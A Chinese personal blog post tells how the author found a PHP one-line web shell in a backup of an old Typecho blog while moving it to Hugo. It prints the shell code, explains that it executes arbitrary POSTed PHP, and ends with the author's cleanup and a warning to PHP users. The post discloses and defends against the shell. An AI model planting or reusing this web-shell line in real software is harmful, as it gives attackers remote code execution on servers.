Typecho网站竟然被放入了木马

前几天把网站从基于PHP的Typecho迁移到了基于Go语言的Hugo,从一个动态网站变成了一个静态化的网站了。我这人比较恋旧,于是把之前的数据备份一下,放在自己的网盘里,万一我有一天想不开又想用Typecho了呢?(应该没有这种万一)。于是打开了篱落主机的虚拟主机后台,使用DA面板作了一个备份,今晚老婆睡了,想把数据做个转移,于是Download下来,本来是解压一下看看下载文件是不是完整的,结果一解压,神奇的事情发生了。

这是个什么木马?

好家伙,电脑的安全软件直接报毒了,这Mac的安全软件我一直当摆设的,我心想这应该是这个软件误报了,于是想打开看看,结果竟然给我删除了,想看都看不了,这不能忍。于是转战Window平台,使用我的Win电脑再试试,结果正常解压了,火绒也没啥反应。打开看看是这样一段代码。

<?php @eval($_POST['checkin']);?>

相信稍微懂点PHP的应该都知道这是怎么回事,这就是著名的PHP一句木马,攻击者可以直接用POST请求上传任意PHP代码,让你的主机来执行。

什么时间植入的?

看了一下服务器中文件的时间,在2017年,应该是在我迁移篱落主机之前就已经被弄上了,可这么个玩意实话说也不是什么高级东西,看来是之前用的一些小主机厂商把我坑了。不过反正我这个站也不用Typecho了,直接7zip密码压缩封存了。

排查其他网站

于是把自己其他几个PHP的站也顺手备份和排查了一下,基本没这个问题,全局搜eval也只是Typecho官方的多语言实现中用了这么一个函数,看了一下代码,没什么大问题。如果你还在使用PHP的博客程序,注意这个问题哦。